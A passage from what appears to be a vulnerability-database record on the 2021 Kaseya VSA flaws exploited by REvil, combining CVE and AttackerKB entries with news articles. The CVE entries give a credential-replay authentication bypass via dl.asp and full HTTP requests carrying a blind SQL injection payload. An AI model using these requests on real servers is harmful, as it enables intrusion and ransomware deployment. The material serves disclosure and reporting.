Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is <https://x.x.x.x/dl.asp> When an attacker download a client for Windows and installs it, the file KaseyaD.ini is generated (C:\\Program Files (x86)\\Kaseya\\XXXXXXXXXX\\KaseyaD.ini) which contains an Agent_Guid and AgentPassword This Agent_Guid and AgentPassword can be used to log in on dl.asp ([https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9](<https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9>)) This request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication. Security issues discovered \u2014\u2013 * Unauthenticated download page leaks credentials * Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents * dl.asp accepts credentials via a GET request * Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients. Impact \u2014\u2013 Via the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-30116", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2022-04-04T00:00:00", "id": "AKB:923F0E8E-CF44-416D-A421-F2177898261A", "href": "https://attackerkb.com/topics/9rki8uOHTf/cve-2021-30116", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-28T02:29:45", "description": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description \u2014\u2013 Given the following request: `GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: `HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 <!DOCTYPE html> <HTML> <HEAD> <title>Whoops.</title> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /> <link id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"></link> ----SNIP----` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. Request: `GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;` Response: `HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 <html> <head> <title>Export Folder</title> <style> ------ SNIP -----`\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-30117", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117"], "modified": "2022-04-04T00:00:00", "id": "AKB:D51087FF-AE7C-4A0E-9BA9-F897BA18D238", "href": "https://attackerkb.com/topics/1KBaJEE0fi/cve-2021-30117", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:22", "description": "[![Kaseya](https://thehackernews.com/images/-amElwT4flB4/YOP-7QNm6uI/AAAAAAAADGc/CJfNcjNsvDcuA16PdqeS-uDGR5r9urDxgCLcBGAsYHQ/s728-e1000/kk.png)](<https://thehackernews.com/images/-amElwT4flB4/YOP-7QNm6uI/AAAAAAAADGc/CJfNcjNsvDcuA16PdqeS-uDGR5r9urDxgCLcBGAsYHQ/s0/kk.png>)\n\nU.S. technology firm Kaseya, which is firefighting the largest ever [supply-chain ransomware strike](<https://thehackernews.com/2021/07/kaseya-revil-ransomware-attack.html>) on its VSA on-premises product, ruled out the possibility that its codebase was unauthorizedly tampered with to distribute malware.\n\nWhile initial reports raised speculations that REvil, the ransomware gang behind the attack, might have gained access to Kaseya's backend infrastructure and abused it to deploy a malicious update to VSA servers running on client premises, in a modus operandi similar to that of the devastating SolarWinds hack, it has since emerged that a never-before-seen security vulnerability ([CVE-2021-30116](<https://thehackernews.com/2021/07/revil-used-0-day-in-kaseya-ransomware.html>)) in the software was leveraged to push ransomware to Kaseya's customers.\n\n\"The attackers were able to exploit zero-day vulnerabilities in the VSA product to bypass authentication and run arbitrary command execution,\" the Miami-headquartered company [noted](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403584098961>) in the incident analysis. \"This allowed the attackers to leverage the standard VSA product functionality to deploy ransomware to endpoints. There is no evidence that Kaseya's VSA codebase has been maliciously modified.\"\n\nIn other words, while successful zero-day exploitation on Kaseya VSA software by itself isn't a supply-chain attack, taking advantage of the exploit to compromise managed service providers (MSPs) and breach their customers would constitute as one.\n\nIt's, however, unclear as to how the hackers learned of the vulnerabilities. The details of those flaws have not yet been publicly released, although Huntress Labs [revealed](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>) that \"Cybercriminals have exploited an arbitrary file upload and code injection vulnerability and have high confidence an authentication bypass was used to gain access into these servers.\"\n\n[![Kaseya Supply-Chain Attack](https://thehackernews.com/images/-M77M4RmcNEc/YOUxOS5ZdUI/AAAAAAAA4Sc/_p6iSb9UrLA1rb-HnPzBoLz2isflL5seACLcBGAsYHQ/s728-e1000/hack.jpg)](<https://thehackernews.com/images/-M77M4RmcNEc/YOUxOS5ZdUI/AAAAAAAA4Sc/_p6iSb9UrLA1rb-HnPzBoLz2isflL5seACLcBGAsYHQ/s0/hack.jpg>) \n--- \nImage Source: [Cybereason](<https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles>) \n \nAbout 60 MSPs and 1,500 downstream businesses around the world have been paralyzed by the ransomware attack, according to the company's CEO Fred Voccola, most of which have been small concerns, like dental practices, architecture firms, plastic surgery centers, and libraries.\n\nHackers associated with the Russia-linked REvil ransomware-as-a-service (RaaS) group initially demanded $70 million in Bitcoins to release a decryptor tool for restoring all the affected businesses' data, although they have swiftly [lowered the asking price](<https://twitter.com/jackhcable/status/1411906687968161792>) to $50 million, suggesting a willingness to negotiate their demands in return for a lesser amount.\n\n\"REvil ransomware has been advertised on underground forums for three years and it is one of the most prolific RaaS operations,\" Kaspersky researchers [said](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) Monday, adding \"the gang earned over $100 million from its operations in 2020.\"\n\nThe attack chain worked by first deploying a malicious dropper via a PowerShell script which was executed through Kaseya's VSA software.\n\n\"This script disables Microsoft Defender for Endpoint protection features and then uses the certutil.exe utility to decode a malicious executable (agent.exe) that drops a legitimate Microsoft binary (MsMpEng.exe, an older version of Microsoft Defender) and malicious library (mpsvc.dll), which is the REvil ransomware. This library is then loaded by the legitimate MsMpEng.exe by utilizing the [DLL side-loading technique](<https://attack.mitre.org/techniques/T1574/002/>),\" the researchers added.\n\nThe incident has also led the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to offer mitigation guidance, urging businesses to enable multi-factor authentication, limit communication with remote monitoring and management (RMM) capabilities to known IP address pairs, and place administrative interfaces of RMM behind a virtual private network (VPN) or a firewall on a dedicated administrative network.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-06T07:03:00", "type": "thn", "title": "Kaseya Rules Out Supply-Chain Attack; Says VSA 0-Day Hit Its Customers Directly", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-07T04:45:24", "id": "THN:6141B56028352C293B8E6D7F0948C55C", "href": "https://thehackernews.com/2021/07/kaseya-rules-out-supply-chain-attack.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:21", "description": "[![](https://thehackernews.com/images/-BuDOZJHtpp4/YOvGtVhVe7I/AAAAAAAADJc/k-syNb5yylI7XPNIuSCJP6bhQaEkNelXgCLcBGAsYHQ/s0/software-update.jpg)](<https://thehackernews.com/images/-BuDOZJHtpp4/YOvGtVhVe7I/AAAAAAAADJc/k-syNb5yylI7XPNIuSCJP6bhQaEkNelXgCLcBGAsYHQ/s0/software-update.jpg>)\n\nFlorida-based software vendor Kaseya on Sunday rolled out urgent updates to address critical security vulnerabilities in its Virtual System Administrator (VSA) solution that was used as a jumping off point to target as many as 1,500 businesses across the globe as part of a widespread [supply-chain ransomware attack](<https://thehackernews.com/2021/07/kaseya-rules-out-supply-chain-attack.html>).\n\nFollowing the incident, the company had urged on-premises VSA customers to shut down their servers until a patch was available. Now, almost 10 days later the firm has shipped [VSA version 9.5.7a (9.5.7.2994)](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041>) with fixes for three new security flaws \u2014 \n\n * **CVE-2021-30116** \\- Credentials leak and business logic flaw\n * **CVE-2021-30119** \\- Cross-site scripting vulnerability\n * **CVE-2021-30120** \\- Two-factor authentication bypass\n\nThe security issues are part of a total of seven vulnerabilities that were discovered and reported to Kaseya by the Dutch Institute for Vulnerability Disclosure ([DIVD](<https://thehackernews.com/2021/07/revil-used-0-day-in-kaseya-ransomware.html>)) earlier in April, of which four other weaknesses were remediated in previous releases \u2014\n\n * **CVE-2021-30117** \\- SQL injection vulnerability (Fixed in VSA 9.5.6)\n * **CVE-2021-30118** \\- Remote code execution vulnerability (Fixed in VSA 9.5.5)\n * **CVE-2021-30121** \\- Local file inclusion vulnerability (Fixed in VSA 9.5.6)\n * **CVE-2021-30201** \\- XML external entity vulnerability (Fixed in VSA 9.5.6)\n\nBesides fixes for the aforementioned shortcomings, the latest version also resolves three other flaws, including a bug that exposed weak password hashes in certain API responses to brute-force attacks as well as a separate vulnerability that could allow the unauthorized upload of files to the VSA server.\n\nFor additional security, Kaseya is [recommending](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403869952657>) limiting access to the VSA Web GUI to local IP addresses by blocking port 443 inbound on the internet firewall for on-premises installations.\n\nKaseya is also warning its customers that installing the patch would force all users to mandatorily change their passwords post login to meet new password requirements, adding that select features have been replaced with improved alternatives and that the \"release introduces some functional defects that will be corrected in a future release.\"\n\nBesides the roll out of the patch for on-premises versions of its VSA remote monitoring and management software, the company has also instantiated the reinstatement of its VSA SaaS infrastructure. \"The restoration of services is progressing according to plan, with 60% of our SaaS customers live and servers coming online for the rest of our customers in the coming hours,\" Kaseya [said](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) in a rolling advisory.\n\nThe latest development comes days after Kaseya cautioned that spammers are capitalizing on the ongoing ransomware crisis to send out fake email notifications that appear to be Kaseya updates, only to infect customers with Cobalt Strike payloads to gain backdoor access to the systems and deliver next-stage malware.\n\nKaseya has said multiple flaws were chained together in what it called a \"sophisticated cyberattack\", and while it isn't exactly clear how it was executed, it's believed that a combination of CVE-2021-30116, CVE-2021-30119, and CVE-2021-30120 was used to carry out the intrusions. REvil, a prolific ransomware gang based in Russia, has claimed responsibility for the incident.\n\nThe use of trusted partners like software makers or service providers like Kaseya to identify and compromise new downstream victims, often called a supply-chain attack, and pair it with file-encrypting ransomware infections has also made it one of the largest and most significant such attacks to date.\n\nInterestingly, Bloomberg on Saturday reported that five former Kaseya employees had flagged the company about \"glaring\" security holes in its software between 2017 and 2020, but their concerns were brushed off.\n\n\"Among the most glaring problems was software underpinned by outdated code, the use of weak encryption and passwords in Kaseya's products and servers, a failure to adhere to basic cybersecurity practices such as regularly patching software and a focus on sales at the expense of other priorities,\" the report [said](<https://www.bloomberg.com/news/articles/2021-07-10/kaseya-failed-to-address-security-before-hack-ex-employees-say>).\n\nThe Kaseya attack marks the third time that ransomware affiliates have abused Kaseya products as a vector to deploy ransomware.\n\nIn [February 2019](<https://www.reddit.com/r/msp/comments/ani14t/local_msp_got_hacked_and_all_clients_cryptolocked/>), the Gandcrab ransomware cartel \u2014 which later [evolved into Sodinokibi and REvil](<https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/>) \u2014 leveraged a vulnerability in a Kaseya plugin for the ConnectWise Manage software to deploy ransomware on the networks of MSPs' customer networks. Then in [June 2019](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), the same group went after Webroot SecureAnywhere and Kaseya VSA products to infect endpoints with Sodinokibi ransomware.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-12T04:36:00", "type": "thn", "title": "Kaseya Releases Patches for Flaws Exploited in Widespread Ransomware Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30119", "CVE-2021-30120", "CVE-2021-30121", "CVE-2021-30201"], "modified": "2021-07-12T10:46:11", "id": "THN:1812C7168898D0993D0783FDC775739F", "href": "https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T14:18:24", "description": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021. By default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is https://x.x.x.x/dl.asp When an attacker download a client for Windows and installs it, the file KaseyaD.ini is generated (C:\\Program Files (x86)\\Kaseya\\XXXXXXXXXX\\KaseyaD.ini) which contains an Agent_Guid and AgentPassword This Agent_Guid and AgentPassword can be used to log in on dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9) This request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication. Security issues discovered --- * Unauthenticated download page leaks credentials * Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents * dl.asp accepts credentials via a GET request * Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients. Impact --- Via the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30116", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2022-07-12T17:42:00", "cpe": [], "id": "CVE-2021-30116", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30116", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-02-09T14:18:26", "description": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 <!DOCTYPE html> <HTML> <HEAD> <title>Whoops.</title> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /> <link id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"></link> ----SNIP---- ``` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 <html> <head> <title>Export Folder</title> <style> ------ SNIP ----- ```", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30117", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117"], "modified": "2022-04-29T18:59:00", "cpe": [], "id": "CVE-2021-30117", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30117", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "krebs": [{"lastseen": "2021-07-28T14:33:34", "description": "![](https://krebsonsecurity.com/wp-content/uploads/2021/07/kaseya.png)\n\nLast week cybercriminals deployed ransomware to 1,500 organizations, including many that provide IT security and technical support to other companies. The attackers exploited a vulnerability in software from **Kaseya**, a Miami-based company whose products help system administrators manage large networks remotely. Now it appears Kaseya's customer service portal was left vulnerable until last week to a data-leaking security flaw that was first identified in the same software six years ago.\n\nOn July 3, the [REvil ransomware affiliate program](<https://krebsonsecurity.com/?s=revil>) began using a zero-day security hole ([CVE-2021-30116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30116>)) to deploy ransomware to hundreds of IT management companies running Kaseya's remote management software -- known as the **Kaseya Virtual System Administrator** (VSA).\n\nAccording to [this entry for CVE-2021-30116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30116>), the security flaw that powers that Kaseya VSA zero-day was assigned a vulnerability number on April 2, 2021, indicating Kaseya [had roughly three months to address the bug before it was exploited in the wild](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>).\n\nAlso on July 3, security incident response firm **Mandiant** notified Kaseya that their billing and customer support site --**portal.kaseya.net** -- was vulnerable to [CVE-2015-2862](<https://nvd.nist.gov/vuln/detail/CVE-2015-2862>), a "directory traversal" vulnerability in Kaseya VSA that allows remote users to read any files on the server using nothing more than a Web browser.\n\nAs its name suggests, CVE-2015-2862 was issued in July 2015. Six years later, Kaseya's customer portal was still exposed to the data-leaking weakness.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2021/07/kaseya-portal.png)\n\nThe Kaseya customer support and billing portal. Image: Archive.org.\n\nMandiant notified Kaseya after hearing about it from **Alex Holden**, founder and chief technology officer of Milwaukee-based cyber intelligence firm [Hold Security](<https://www.holdsecurity.com>). Holden said the 2015 vulnerability was present on Kaseya's customer portal until Saturday afternoon, allowing him to download the site's ["web.config" file](<https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/webconfig-file-detected/>), a server component that often contains sensitive information such as usernames and passwords and the locations of key databases.\n\n"It's not like they forgot to patch something that Microsoft fixed years ago," Holden said. "It's a patch for their own software. And it's not zero-day. It's from 2015!"\n\nThe official description of CVE-2015-2862 says a would-be attacker would need to be already authenticated to the server for the exploit to work. But Holden said that was not the case with the vulnerability on the Kaseya portal that he reported via Mandiant.\n\n"This is worse because the CVE calls for an authenticated user," Holden said. "This was not."\n\n**Michael Sanders**, executive vice president of account management at Kaseya, confirmed that the customer portal was taken offline in response to a vulnerability report. Sanders said the portal had been retired in 2018 in favor of a more modern customer support and ticketing system, yet somehow the old site was still left available online.\n\n"It was deprecated but left up," Sanders said.\n\nIn a written statement shared with KrebsOnSecurity, Kaseya said that in 2015 CERT reported two vulnerabilities in its VSA product.\n\n"We worked with CERT on responsible disclosure and released patches for VSA versions V7, R8, R9 and R9 along with the public disclosure (CVEs) and notifications to our customers. Portal.kaseya.net was not considered by our team to be part of the VSA shipping product and was not part of the VSA product patch in 2015. It has no access to customer endpoints and has been shut down - and will no longer be enabled or used by Kaseya."\n\n"At this time, there is no evidence this portal was involved in the VSA product security incident," the statement continued. "We are continuing to do forensic analysis on the system and investigating what data is actually there."\n\nThe REvil ransomware group said affected organizations could negotiate independently with them for a decryption key, or someone could pay $70 million worth of virtual currency to buy a key that works to decrypt all systems compromised in this attack.\n\nBut Sanders said every ransomware expert Kaseya consulted so far has advised against negotiating for one ransom to unlock all victims.\n\n"The problem is that they don't have our data, they have our customers' data," Sanders said. "We've been counseled not to do that by every ransomware negotiating company we've dealt with. They said with the amount of individual machines hacked and ransomwared, it would be very difficult for all of these systems to be remediated at once."\n\nIn a video posted to Youtube on July 6, Kaseya CEO **Fred Voccola** said the ransomware attack had "limited impact, with only approximately 50 of the more than 35,000 Kaseya customers being breached."\n\n"While each and every customer impacted is one too many, the impact of this highly sophisticated attack has proven to be, thankfully, greatly overstated," Voccola said.\n\nThe zero-day vulnerability that led to Kaseya customers (and customers of those customers) getting ransomed was discovered and reported to Kaseya by [Wietse Boonstra](<https://twitter.com/wietsman>), a researcher with the **Dutch Institute for Vulnerability Disclosure** (DIVD). \n\nIn [a July 4 blog post](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>), DIVD's** Victor Gevers **wrote that 